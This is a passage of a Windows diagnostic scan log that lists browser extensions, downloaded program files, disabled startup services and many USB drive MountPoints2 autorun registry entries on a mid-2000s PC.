CmdMapping\\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\Java\jre1.5.0_06\bin\NPJPI150_06.dll [Sun Java Console] -> Sun Microsystems, Inc. [Ver = 5.0.60.5 | Size = 69746 bytes | Modified Date = 11/10/2005 11:22:12 AM | Attr =    ]
CmdMapping\\{3369AF0D-62E9-4bda-8103-B4C75499B578} [HKEY_LOCAL_MACHINE] -> %ProgramFiles%\AOL\AOL Toolbar 5.0\aoltb.dll [AOL Toolbar] -> AOL LLC [Ver = 5.0.17.1 | Size = 1025584 bytes | Modified Date = 3/23/2007 1:35:30 PM | Attr =    ]
< Internet Explorer Menu Extensions [HKEY_CURRENT_USER\] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\ -> 
&AOL Toolbar Search -> %ProgramFiles%\AOL\AOL Toolbar 5.0\resources\en-us\local\search.html ->  [Ver =  | Size = 747 bytes | Modified Date = 9/7/2006 1:59:50 PM | Attr =    ]
< Internet Explorer Plugins [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\ -> 
PluginsPageFriendlyName -> Microsoft ActiveX Gallery -> 
PluginsPage -> http://activex.microsoft.com/controls/find.asp?ext=%s&mime=%s -> 
< User Agent Post Platform [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform -> 
GoogleT5 ->  -> 
< DNS Name Servers [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\ -> 
{ED5BFCE9-904F-430F-B922-9114AF6D916F} ->    (Intel(R) 82562V-2 10/100 Network Connection) -> 
< Protocol Handlers [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ -> 
ipp: [HKEY_LOCAL_MACHINE] -> No CLSID value
msdaipp: [HKEY_LOCAL_MACHINE] -> No CLSID value
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\ -> 
{26FCCDF9-A7E1-452A-A73D-7BF7B4D0BA6C}[HKEY_LOCAL_MACHINE] -> http://o.aolcdn.com/pictures/ap/Resources/v2.15/cab/aolpPlugins.10.6.0.8.cab[AOL Pictures Uploader Class] -> 
{8AD9C840-044E-11D1-B3E9-00805F499D93}[HKEY_LOCAL_MACHINE] -> http://java.sun.com/update/1.5.0/jinstall-1_5_0_06-windows-i586.cab[Java Plug-in 1.5.0_06] -> 
{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}[HKEY_LOCAL_MACHINE] -> http://java.sun.com/update/1.5.0/jinstall-1_5_0_06-windows-i586.cab[Java Plug-in 1.5.0_06] -> 
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}[HKEY_LOCAL_MACHINE] -> http://java.sun.com/update/1.5.0/jinstall-1_5_0_06-windows-i586.cab[Java Plug-in 1.5.0_06] -> 
< Module Usage Keys [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\ -> 
Reg Error: Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage\ not found. -> -> 


[Registry - Additional Scans - Non-Microsoft Only]
< Disabled MSConfig Services [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\services -> 
AOL ACS -> -> 
dlcx_device -> -> 
GoogleDesktopManager-010708-104812 -> -> 
GoToAssist -> -> 
gusvc -> -> 
PcCtlCom -> -> 
sprtsvc_dellsupportcenter -> -> 
stllssvr -> -> 
Tmntsrv -> -> 
TmPfw -> -> 
tmproxy -> -> 
< Disabled MSConfig Folder Items [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\ -> 
C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Google Updater.lnk -> %ProgramFiles%\Google\Google Updater\GoogleUpdater.exe -> Google [Ver = 2.2.1202.1501.beta | Size = 124400 bytes | Modified Date = 5/8/2008 8:19:38 PM | Attr =    ]
< Disabled MSConfig Registry Items [HKEY_LOCAL_MACHINE] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ -> 
Adobe Reader Speed Launcher hkey=HKLM key=SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> %ProgramFiles%\Adobe\Reader 8.0\Reader\reader_sl.exe -> Adobe Systems Incorporated [Ver = 8.0.0.0 | Size = 39792 bytes | Modified Date = 1/11/2008 10:16:38 PM | Attr =    ]
Alcmtr hkey=HKLM key=SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> %SystemRoot%\ALCMTR.EXE -> Realtek Semiconductor Corp. [Ver = 1.6.0.2 | Size = 69632 bytes | Modified Date = 7/16/2007 5:48:40 PM | Attr =    ]
< MountPoints2 > -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\E\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\H\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\I\_Autorun\DefaultIcon\\ -> 
I:\LaunchU3.exe -> I:\LaunchU3.exe ->  [Ver = 1, 4, 0, 7 | Size = 1110016 bytes | Modified Date = 2/12/2007 6:33:37 PM | Attr = R  ]
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J\_Autorun\DefaultIcon\\ -> 
J:\LaunchU3.exe -> J:\LaunchU3.exe -> File not found
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\K\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\K\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\L\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\L\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{00151da2-24eb-11dd-8f90-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{00151da2-24eb-11dd-8f90-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{00151da2-24eb-11dd-8f90-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50d-241e-11dd-8f8f-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50d-241e-11dd-8f8f-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50d-241e-11dd-8f8f-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50d-241e-11dd-8f8f-001d09963004}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50d-241e-11dd-8f8f-001d09963004}\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50d-241e-11dd-8f8f-001d09963004}\_Autorun\DefaultIcon\\ -> 
I:\LaunchU3.exe -> I:\LaunchU3.exe ->  [Ver = 1, 4, 0, 7 | Size = 1110016 bytes | Modified Date = 2/12/2007 6:33:37 PM | Attr = R  ]
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50e-241e-11dd-8f8f-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50e-241e-11dd-8f8f-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{09f6f50e-241e-11dd-8f8f-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755c-eacc-11d8-87d0-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755c-eacc-11d8-87d0-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755d-eacc-11d8-87d0-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755d-eacc-11d8-87d0-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755e-eacc-11d8-87d0-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755e-eacc-11d8-87d0-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755f-eacc-11d8-87d0-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{29fa755f-eacc-11d8-87d0-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{52f03b12-1b12-11dd-8f7e-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{52f03b12-1b12-11dd-8f7e-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{52f03b12-1b12-11dd-8f7e-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf7-22dc-11dd-8f86-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf7-22dc-11dd-8f86-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf7-22dc-11dd-8f86-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 20 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf7-22dc-11dd-8f86-001d09963004}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf7-22dc-11dd-8f86-001d09963004}\_Autorun\DefaultIcon\ -> -> 
*~EmptyValue* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf7-22dc-11dd-8f86-001d09963004}\_Autorun\DefaultIcon\\ -> 
K:\LaunchU3.exe -> K:\LaunchU3.exe ->  [Ver = 1, 1, 0, 3 | Size = 950272 bytes | Modified Date = 4/18/2006 3:33:36 PM | Attr = R  ]
0 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf8-22dc-11dd-8f86-001d09963004}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf8-22dc-11dd-8f86-001d09963004}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{85e0ebf8-22dc-11dd-8f86-001d09963004}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF 01 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2c-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2c-1af0-11dd-8f7c-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 60 00 00 00 09 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\_Autorun\DefaultIcon\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2d-1af0-11dd-8f7c-806d6172696f}\_Autorun\DefaultIcon\\ -> D:\Autorun.ico [D:\Autorun.ico] -> File not found
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2e-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2e-1af0-11dd-8f7c-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2e-1af0-11dd-8f7c-806d6172696f}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2f-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe2f-1af0-11dd-8f7c-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe30-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe30-1af0-11dd-8f7c-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe31-1af0-11dd-8f7c-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe31-1af0-11dd-8f7c-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{977fbe31-1af0-11dd-8f7c-806d6172696f}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 01 00 01 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 06 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd26-1700-11dd-88c1-86f8fa4bea56}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd26-1700-11dd-88c1-86f8fa4bea56}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd26-1700-11dd-88c1-86f8fa4bea56}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd27-1700-11dd-88c1-86f8fa4bea56}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd27-1700-11dd-88c1-86f8fa4bea56}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd27-1700-11dd-88c1-86f8fa4bea56}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd28-1700-11dd-88c1-86f8fa4bea56}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd28-1700-11dd-88c1-86f8fa4bea56}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd28-1700-11dd-88c1-86f8fa4bea56}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd29-1700-11dd-88c1-86f8fa4bea56}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd29-1700-11dd-88c1-86f8fa4bea56}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a144cd29-1700-11dd-88c1-86f8fa4bea56}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721752-16c6-11dd-bf56-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721752-16c6-11dd-bf56-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721753-16c6-11dd-bf56-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721753-16c6-11dd-bf56-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721754-16c6-11dd-bf56-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721754-16c6-11dd-bf56-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721755-16c6-11dd-bf56-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721755-16c6-11dd-bf56-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721756-16c6-11dd-bf56-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721756-16c6-11dd-bf56-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ae721757-16c6-11dd-bf56-806d6172696f}\ -> -> 
